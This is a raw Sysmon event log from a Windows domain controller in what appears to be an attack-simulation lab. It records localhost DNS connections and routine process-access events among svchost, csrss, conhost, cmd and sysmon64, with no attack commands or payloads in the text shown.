354300x8000000000000000213314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51078- 354300x8000000000000000213313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-51078-false127.0.0.1-53domain 354300x8000000000000000213312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{00000000-0000-0000-0000-000000000000}3712<unknown process>-udpfalsefalse127.0.0.1-51077-false127.0.0.1-53domain 354300x8000000000000000213311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51077- 354300x8000000000000000213310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.720{00000000-0000-0000-0000-000000000000}3712<unknown process>-udptruefalse127.0.0.1-51077-false127.0.0.1-53domain 354300x8000000000000000213309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51076- 354300x8000000000000000213308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51075- 354300x8000000000000000213307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.647{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51074- 354300x8000000000000000213306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.567{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51073- 354300x8000000000000000213305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.566{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51072- 354300x8000000000000000213304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.566{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51071- 354300x8000000000000000213303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.506{00000000-0000-0000-0000-000000000000}3452<unknown process>-udpfalsefalse127.0.0.1-51070-false127.0.0.1-53domain 354300x8000000000000000213302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.506{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51070- 354300x8000000000000000213301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.506{00000000-0000-0000-0000-000000000000}3452<unknown process>-udptruefalse127.0.0.1-51070-false127.0.0.1-53domain 354300x8000000000000000213300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.506{00000000-0000-0000-0000-000000000000}3452<unknown process>-udpfalsefalse127.0.0.1-51069-false127.0.0.1-53domain 354300x8000000000000000213299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.506{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51069- 354300x8000000000000000213298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.505{00000000-0000-0000-0000-000000000000}3452<unknown process>-udptruefalse127.0.0.1-51069-false127.0.0.1-53domain 354300x8000000000000000213297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.505{00000000-0000-0000-0000-000000000000}3452<unknown process>-udpfalsefalse127.0.0.1-51068-false127.0.0.1-53domain 354300x8000000000000000213296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.505{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51068- 354300x8000000000000000213295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.505{00000000-0000-0000-0000-000000000000}3452<unknown process>-udptruefalse127.0.0.1-51068-false127.0.0.1-53domain 354300x8000000000000000213294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.429{00000000-0000-0000-0000-000000000000}300<unknown process>-udpfalsefalse127.0.0.1-51067-false127.0.0.1-53domain 354300x8000000000000000213293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.428{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51067- 354300x8000000000000000213292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.428{00000000-0000-0000-0000-000000000000}300<unknown process>-udptruefalse127.0.0.1-51067-false127.0.0.1-53domain 354300x8000000000000000213291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{00000000-0000-0000-0000-000000000000}5000<unknown process>-udpfalsefalse127.0.0.1-51066-false127.0.0.1-53domain 354300x8000000000000000213290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51066- 354300x8000000000000000213289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{00000000-0000-0000-0000-000000000000}5000<unknown process>-udptruefalse127.0.0.1-51066-false127.0.0.1-53domain 354300x8000000000000000213288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{00000000-0000-0000-0000-000000000000}5000<unknown process>-udpfalsefalse127.0.0.1-51065-false127.0.0.1-53domain 354300x8000000000000000213287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51065- 354300x8000000000000000213286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{00000000-0000-0000-0000-000000000000}5000<unknown process>-udptruefalse127.0.0.1-51065-false127.0.0.1-53domain 354300x8000000000000000213285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.350{00000000-0000-0000-0000-000000000000}5000<unknown process>-udpfalsefalse127.0.0.1-51064-false127.0.0.1-53domain 354300x8000000000000000213284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.349{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51064- 354300x8000000000000000213283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.349{00000000-0000-0000-0000-000000000000}5000<unknown process>-udptruefalse127.0.0.1-51064-false127.0.0.1-53domain 354300x8000000000000000213282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{00000000-0000-0000-0000-000000000000}7368<unknown process>-udpfalsefalse127.0.0.1-51063-false127.0.0.1-53domain 354300x8000000000000000213281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51063- 354300x8000000000000000213280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{00000000-0000-0000-0000-000000000000}7368<unknown process>-udptruefalse127.0.0.1-51063-false127.0.0.1-53domain 354300x8000000000000000213279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{00000000-0000-0000-0000-000000000000}7368<unknown process>-udpfalsefalse127.0.0.1-51062-false127.0.0.1-53domain 354300x8000000000000000213278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51062- 354300x8000000000000000213277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{00000000-0000-0000-0000-000000000000}7368<unknown process>-udptruefalse127.0.0.1-51062-false127.0.0.1-53domain 354300x8000000000000000213276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{00000000-0000-0000-0000-000000000000}7368<unknown process>-udpfalsefalse127.0.0.1-51061-false127.0.0.1-53domain 354300x8000000000000000213275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.241{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51061- 354300x8000000000000000213274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.241{00000000-0000-0000-0000-000000000000}7368<unknown process>-udptruefalse127.0.0.1-51061-false127.0.0.1-53domain 354300x8000000000000000213273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.128{00000000-0000-0000-0000-000000000000}4552<unknown process>-udpfalsefalse127.0.0.1-51060-false127.0.0.1-53domain 354300x8000000000000000213272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.128{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51060- 354300x8000000000000000213271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.128{00000000-0000-0000-0000-000000000000}4552<unknown process>-udptruefalse127.0.0.1-51060-false127.0.0.1-53domain 354300x8000000000000000213270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.127{00000000-0000-0000-0000-000000000000}4552<unknown process>-udpfalsefalse127.0.0.1-51059-false127.0.0.1-53domain 354300x8000000000000000213269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51059- 354300x8000000000000000213268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.127{00000000-0000-0000-0000-000000000000}4552<unknown process>-udptruefalse127.0.0.1-51059-false127.0.0.1-53domain 354300x8000000000000000213267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.127{00000000-0000-0000-0000-000000000000}4552<unknown process>-udpfalsefalse127.0.0.1-51058-false127.0.0.1-53domain 354300x8000000000000000213266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.127{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51058- 354300x8000000000000000213265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.126{00000000-0000-0000-0000-000000000000}4552<unknown process>-udptruefalse127.0.0.1-51058-false127.0.0.1-53domain 354300x8000000000000000213264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.042{00000000-0000-0000-0000-000000000000}5124<unknown process>-udpfalsefalse127.0.0.1-51057-false127.0.0.1-53domain 354300x8000000000000000213263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.042{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51057- 354300x8000000000000000213262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.042{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-51057-false127.0.0.1-53domain 354300x8000000000000000213261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.042{00000000-0000-0000-0000-000000000000}5124<unknown process>-udpfalsefalse127.0.0.1-51056-false127.0.0.1-53domain 354300x8000000000000000213260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.042{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51056- 354300x8000000000000000213259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.041{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-51056-false127.0.0.1-53domain 354300x8000000000000000213258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.041{00000000-0000-0000-0000-000000000000}5124<unknown process>-udpfalsefalse127.0.0.1-51055-false127.0.0.1-53domain 354300x8000000000000000213257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.041{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51055- 354300x8000000000000000213256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.041{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-51055-false127.0.0.1-53domain 354300x8000000000000000213255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{00000000-0000-0000-0000-000000000000}4040<unknown process>-udpfalsefalse127.0.0.1-51054-false127.0.0.1-53domain 354300x8000000000000000213254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51054- 354300x8000000000000000213253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{00000000-0000-0000-0000-000000000000}4040<unknown process>-udptruefalse127.0.0.1-51054-false127.0.0.1-53domain 354300x8000000000000000213252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{00000000-0000-0000-0000-000000000000}4040<unknown process>-udpfalsefalse127.0.0.1-51053-false127.0.0.1-53domain 354300x8000000000000000213251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51053- 354300x8000000000000000213250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{00000000-0000-0000-0000-000000000000}4040<unknown process>-udptruefalse127.0.0.1-51053-false127.0.0.1-53domain 354300x8000000000000000213249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{00000000-0000-0000-0000-000000000000}4040<unknown process>-udpfalsefalse127.0.0.1-51052-false127.0.0.1-53domain 354300x8000000000000000213248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51052- 354300x8000000000000000213247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.969{00000000-0000-0000-0000-000000000000}4040<unknown process>-udptruefalse127.0.0.1-51052-false127.0.0.1-53domain 354300x8000000000000000213246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.873{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-51051-false127.0.0.1-53domain 354300x8000000000000000213245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.873{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51051- 354300x8000000000000000213244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.873{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-51051-false127.0.0.1-53domain 354300x8000000000000000213243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.800{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-51050-false127.0.0.1-53domain 354300x8000000000000000213242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.800{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51050- 354300x8000000000000000213241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.800{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-51050-false127.0.0.1-53domain 354300x8000000000000000213240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.799{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-51049-false127.0.0.1-53domain 354300x8000000000000000213239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.799{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51049- 354300x8000000000000000213238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.799{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-51049-false127.0.0.1-53domain 354300x8000000000000000213237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.797{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-51048-false127.0.0.1-53domain 354300x8000000000000000213236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51048- 354300x8000000000000000213235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.797{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-51048-false127.0.0.1-53domain 10341000x8000000000000000213234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.310{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6845-000000005F02}5516C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.310{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6845-000000005F02}5516C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.310{2E1864BB-18F8-629A-6845-000000005F02}55163140C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6745-000000005F02}4348C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6845-000000005F02}5516C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.294{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 